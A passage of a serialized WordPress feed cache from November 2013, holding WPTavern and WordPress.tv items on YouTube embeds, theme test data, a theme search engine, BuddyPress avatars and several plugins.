Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: How to Disable Related Videos for YouTube Embeds in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10873\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:123:\"http://feedproxy.google.com/~r/WordpressTavern/~3/nzi_d1TU9MA/how-to-disable-related-videos-for-youtube-embeds-in-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3745:\"<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/11/youtube-logo.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/11/youtube-logo.jpg?resize=313%2C136\" alt=\"youtube-logo\" class=\"alignright size-full wp-image-10884\" /></a>When you embed a YouTube video in a WordPress post, it is generally added to illustrate your content. Sometimes your video is the main focal point of the post. Chances are that you don&#8217;t want to be sending users to related videos after viewing the embedded one. You want to keep the reader&#8217;s attention on your content. The video was meant to be a tool to capture that attention in the first place. <span id=\"more-10873\"></span></p>\n<h3>Turn Off Related Videos</h3>\n<p>Related videos is a YouTube feature that can be a lot of fun when you&#8217;re browsing YouTube, but it&#8217;s not so helpful on videos you embed in WordPress posts. There are two different ways to turn related videos off, depending on how your WordPress site is set up. </p>\n<h4>WordPress.com Sites and Jetpack-Powered WordPress.org Sites</h4>\n<p>On WordPress.com and on self-hosted WordPress sites using Jetpack, you can simply tack on &#8216;<strong>&#038;rel=0</strong>&#8216; to the end of the YouTube URL to disable related videos at the end of the video. </p>\n<p>Normally, you would just grab the URL from the browser window and paste it in on its own line:</p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/11/youtube-url.jpg\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/11/youtube-url.jpg?resize=312%2C34\" alt=\"youtube-url\" class=\"aligncenter size-full wp-image-10882\" /></a></p>\n<p>On our site we are using Jetpack, so we just tack on &#8216;<strong>&#038;rel=0</strong>&#8216; to the URL:</p>\n<pre>http://www.youtube.com/watch?v=xPe4NbWQzkM&#038;rel=0</pre>\n<p>The output for that is this ridiculously cute video with <strong>no related videos at the end</strong>:</p>\n<p><span class=\"embed-youtube\"></span></p>\n<p>The same method can also be applied if you opt for the <a href=\"http://jetpack.me/support/shortcode-embeds/\" target=\"_blank\">Jetpack shortcode embed</a>. More <a href=\"http://en.support.wordpress.com/videos/youtube/#video-customization-options\" target=\"_blank\">video customization options</a> can be found in the WordPress.com documentation.</p>\n<h4>Self-Hosted WordPress Sites Without Jetpack</h4>\n<p>If you have a self-hosted WordPress site and you&#8217;re not using Jetpack, turning off related videos can be done by selecting the embed option directly from YouTube, instead of using <a href=\"http://codex.wordpress.org/Embeds\" target=\"_blank\">WordPress&#8217; oembed feature</a>. </p>\n<p>When you&#8217;re on the YouTube video&#8217;s page, select embed and then <strong>uncheck</strong> the option that says: &#8220;<strong>Show suggested videos when the video finishes.</strong>&#8221;</p>\n<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/11/uncheck.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/11/uncheck.jpg?resize=526%2C316\" alt=\"uncheck\" class=\"aligncenter size-full wp-image-10885\" /></a></p>\n<p>If getting the embed code is a bother, you might try using a plugin such as <a href=\"http://wordpress.org/plugins/hide-youtube-related-videos/\" target=\"_blank\">Hide YouTube Related Videos</a> to do this automatically.</p>\n<p>This topic tends to be a bit tricky, depending on if you are on WordPress.com, self-hosted with Jetpack or self-hosted without Jetpack. Fortunately, there&#8217;s an easy solution for everyone.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/nzi_d1TU9MA\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 00:24:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"WPTavern: WP Test: Unit Testing Data for WordPress Themes and Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10848\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:120:\"http://feedproxy.google.com/~r/WordpressTavern/~3/g9jU9IlaVu8/wp-test-unit-testing-data-for-wordpress-themes-and-plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2414:\"<p><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/11/wptest.png?resize=560%2C135\" alt=\"wptest\" class=\"aligncenter size-full wp-image-10853\" /><br />\n<a href=\"http://wptest.io/\" title=\"WP Test\" target=\"_blank\">WP Test</a> is a site that any WordPress theme or plugin developer will want to bookmark. Created by WordPress developer <a href=\"https://twitter.com/manovotny\" target=\"_blank\">Michael Novotny</a>, WP Test exists to provide test data for WordPress themes and plugins. The site is very simple and includes only a download and a demo button.</p>\n<p>What&#8217;s in the download package? WP Test sums it up nicely:</p>\n<blockquote><p>A fantastically exhaustive set of test data to measure the integrity of your plugins and themes.</p></blockquote>\n<p><span id=\"more-10848\"></span></p>\n<p>The WP Test data is based off of recommendations from <a href=\"http://codex.wordpress.org/Theme_Unit_Test\" target=\"_blank\">WordPress’ Theme Unit Test data</a> found in the codex. Added into the mix is Novotny&#8217;s years of experience supporting themes and plugins. </p>\n<h3>The Importance of Unit Testing</h3>\n<p>Unit testing is a recommended practice for developers who create software for other people to use. Essentially, it involves putting your code through the paces using a set of control data. If you want your theme or plugin to provide a smooth experience out of the box, then you need to perform tests before it&#8217;s released. WP Test makes unit testing easy. Download the test data and then import it into your test site using the <a href=\"http://wordpress.org/extend/plugins/wordpress-importer/\" target=\"_blank\">WordPress Importer</a>.</p>\n<p>Check out the <a href=\"http://wptest.io/demo/\" target=\"_blank\">demo</a> to see the full range of test data in action on a site.</p>\n<p>The project is maintained on <a href=\"https://github.com/manovotny/wptest\" target=\"_blank\">github</a> if you want to follow the repository or contribute. Novotny emphasizes that WP Test is by no means a fully comprehensive set of test data and will always be evolving to provide more test scenarios. If you think <a href=\"http://wptest.io/\" target=\"_blank\">WP Test</a> is missing some important tests, please get in touch via the <a href=\"http://wptest.io/contact/\" target=\"_blank\">contact form</a>.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/g9jU9IlaVu8\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 21:12:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: WordPress By Example: A Search Engine for WordPress Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10838\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://feedproxy.google.com/~r/WordpressTavern/~3/fATG7A3BVd4/wordpress-by-example-a-wordpress-specific-search-engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3563:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/11/WPByExampleLogo.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/11/WPByExampleLogo.jpg?resize=230%2C44\" alt=\"WordPress By Example Logo\" class=\"alignright size-full wp-image-10839\" /></a>A few days ago, we <a href=\"http://www.wptavern.com/how-to-find-live-examples-of-sites-using-a-theme\" title=\"http://www.wptavern.com/how-to-find-live-examples-of-sites-using-a-theme\">mentioned an article by WPShout.com</a> that explained how to find live examples of WordPress powered sites using themes. Today, I wanted to share a new site that&#8217;s been launched called <a href=\"http://www.wpbyexample.com/\" title=\"http://www.wpbyexample.com/\">WordPress by Example</a>. It&#8217;s a WordPress specific search engine designed to showcase sites using themes related to search terms such as photography, or weddings. <span id=\"more-10838\"></span></p>\n<p>Developed by Joris Van den Bogaert, WordPress by Example has three different ways you can search. <em>Organic, Premium WordPress Themes, and Free WordPress Themes</em>. Just like any other search engine, this one works via keywords. In this example, I used the keyword of <strong>weddings</strong> with the organic search option. </p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/11/WPByExampleOrganicSearchResults.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/11/WPByExampleOrganicSearchResults.jpg?resize=500%2C376\" alt=\"Organic Search Results From WP By Example\" class=\"aligncenter size-large wp-image-10840\" /></a></p>\n<p>While some of the results were relevant, displaying modified themes catering to weddings, other results were not as relevant. When you click on any of the results, a larger image is displayed with a link at the bottom that takes you to a page with more information about that result. The additional information shown includes what theme is being used on the site, information about the site, and the source of the theme. Within the right sidebar, there are buttons to buy the theme, visit the actual website, or view a demo of the theme in use on the site. As you might have guessed, the buy button is an affiliate link. </p>\n<h3>A Nice Alternative To The Typical WordPress Theme Search Engine</h3>\n<p>There are now hundreds of themes that are released for WordPress everyday. Most have a price tag while others are free. With all of the various WordPress themes available in so many different places, a cottage industry has developed trying to organize and index all of them. Examples include <a href=\"http://qualithemes.com/\" title=\"http://qualithemes.com/\">QualiThemes</a>, <a href=\"http://themesorter.com/\" title=\"http://themesorter.com/\">ThemeSorter</a>, and <a href=\"http://yellowthemes.com/\" title=\"http://yellowthemes.com/\">Yellow Themes</a>. None of these theme finders show sites actually using the theme. </p>\n<p>While I like the idea behind WordPress by Example, I couldn&#8217;t help but notice the number of websites that were butchered beyond recognition. This is why I think it&#8217;s better for a theme company to put together site showcases that really show off what the theme is capable of. If nothing else, this search engine shows why good web designers are still needed. Apparently, there are not enough to go around. </p>\n<p>Give the site a try and tell me your thoughts in the comments. </p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/fATG7A3BVd4\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 18:00:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WordPress.tv: Judy Wilson: Security With WordPress.org Self-Installation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24553\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wordpress.tv/2013/11/01/judy-wilson-security-with-wordpress-org-self-installation/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:693:\"<div id=\"v-N98qh0qC-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24553/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24553/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24553&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/11/01/judy-wilson-security-with-wordpress-org-self-installation/\"><img alt=\"Judy Wilson: Security With WordPress.org Self-Installation\" src=\"http://videos.videopress.com/N98qh0qC/video-6d2e551714_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 11:35:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WordPress.tv: Panel Discussion: Themes And Theme Frameworks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24560\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wordpress.tv/2013/11/01/panel-discussion-themes-and-theme-frameworks/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:667:\"<div id=\"v-hNA5N7pb-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24560/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24560/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24560&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/11/01/panel-discussion-themes-and-theme-frameworks/\"><img alt=\"Panel Discussion: Themes And Theme Frameworks\" src=\"http://videos.videopress.com/hNA5N7pb/video-834135521e_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 10:16:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WPTavern: Learn How to Customize BuddyPress Avatars\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10822\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"http://feedproxy.google.com/~r/WordpressTavern/~3/TIEqkhz6NtQ/learn-how-to-customize-buddypress-avatars\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2678:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/bp-circles.jpg\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/bp-circles.jpg?resize=300%2C254\" alt=\"bp-circles\" class=\"alignright size-medium wp-image-10825\" /></a>BuddyPress 1.9 is right around the corner and should be released in early November. The initiative to improve the BuddyPress codex has inspired a number of new pages and tutorials. Documentation leaders <a href=\"https://twitter.com/hnla\" target=\"_blank\">@hnla</a> and <a href=\"https://twitter.com/mercime_one\" target=\"_blank\">@mercime</a> have restructured the codex so that pages are not so deeply nested. They&#8217;ve also been organizing the addition of new articles and tutorials. </p>\n<p>I decided to jump in and submit a guide on how to customize BuddyPress avatars.<span id=\"more-10822\"></span> I wasn&#8217;t a very experienced codex contributor, but the BuddyPress folks make it very easy. They will help you to find an area where you can contribute.</p>\n<p>In the guide to <a href=\"http://codex.buddypress.org/getting-started/guides/customizing-buddypress-avatars/\" title=\"How to Customize BuddyPress Avatars\" target=\"_blank\">Customizing BuddyPress Avatars</a> you will learn how to:</p>\n<ul>\n<li>Understand the Default BuddyPress Avatar Sizes</li>\n<li>Change BuddyPress Avatar Sizes Using bp-custom.php</li>\n<li>Change the Default BuddyPress Avatar (Mystery Man)</li>\n<li>Customize BuddyPress Avatars With CSS</li>\n<li>Create Circular BuddyPress Avatars</li>\n<li>Adjust the Crop Pane Window for Circular Avatars</li>\n<li>Disable BuddyPress Avatar Upload</li>\n</ul>\n<p>Check it out and let me know if there&#8217;s anything else you&#8217;d like to see in the BuddyPress avatar tutorials. </p>\n<h3>Get Involved in BuddyPress Documentation</h3>\n<p>Lots of new guides and tutorials are popping up in the codex. Better documentation benefits everyone involved in BuddyPress. It helps to lessen the support load and also provides valuable information for those who want to extend the platform. If you want to help contribute, check out the <a href=\"http://codex.buddypress.org/participate-and-contribute/codex-standards-guidelines/\" target=\"_blank\">Codex Standards &#038; Guidelines</a> for BuddyPress. <a href=\"https://docs.google.com/spreadsheet/ccc?key=tOT3Q1oFPiTC-c1MDp1ZtRw#gid=0\" target=\"_blank\">Find an article to write</a> and get in touch on the <a href=\"http://bpdevel.wordpress.com/2013/10/11/codex-progress-update-toc-re-visited/\" target=\"_blank\">BuddyPress Development blog</a>.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/TIEqkhz6NtQ\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 04:10:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: New Plugin Adds ManageWP.org Sharing Button to Jetpack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10784\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"http://feedproxy.google.com/~r/WordpressTavern/~3/HfR9QVbv4TY/new-plugin-adds-managewp-org-sharing-button-to-jetpack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1694:\"<p>Looking for a quick and convenient way to add the <a href=\"http://managewp.org/resources\" target=\"_blank\">ManageWP.org button</a> to your WordPress site? If you&#8217;re using the Jetpack sharing module, the new <a href=\"http://wordpress.org/plugins/mwp-sharing-jetpack/\" target=\"_blank\">ManageWP.org Sharing For Jetpack</a> plugin will automatically add it for you.</p>\n<p>Plugin developer <a href=\"http://jeremyherve.com/\" target=\"_blank\">Jeremy Herve</a> was inspired by Jeff&#8217;s recent <a href=\"http://www.wptavern.com/how-to-add-a-managewp-button-to-jetpack-sharing\" target=\"_blank\">tutorial</a>, which includes a walkthrough on the steps to adding the button as a new service. His plugin does all the work for you so that the only thing you have to do is drag the button to the enabled services area.<span id=\"more-10784\"></span></p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/managewp-button.jpg\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/managewp-button.jpg?resize=410%2C41\" alt=\"managewp-button\" class=\"aligncenter size-full wp-image-10813\" /></a></p>\n<p>You don&#8217;t need to be a major WordPress news site to add this button. If you publish articles with any kind of WordPress content, including tutorials, products, reviews, news, etc, then adding this button will put your content in front of more readers. You can now install the <a href=\"http://wordpress.org/plugins/mwp-sharing-jetpack/\" target=\"_blank\">ManageWP.org Sharing For Jetpack</a> plugin via the plugins screen within your dashboard.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/HfR9QVbv4TY\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 01:21:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: 12+ WordPress Multisite Enhancements in One Free Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10782\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"http://feedproxy.google.com/~r/WordpressTavern/~3/-ePUQn-z2mA/12-wordpress-multisite-enhancements-in-one-free-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5897:\"<p>German WordPress developer <a href=\"http://bueltge.de/\" target=\"_blank\">Frank Bültge</a> has spent many long hours creating a plugin that encapsulates more than a dozen enhancements often requested by multisite super admins. His Multisite Enhancements plugin has been hosted on <a 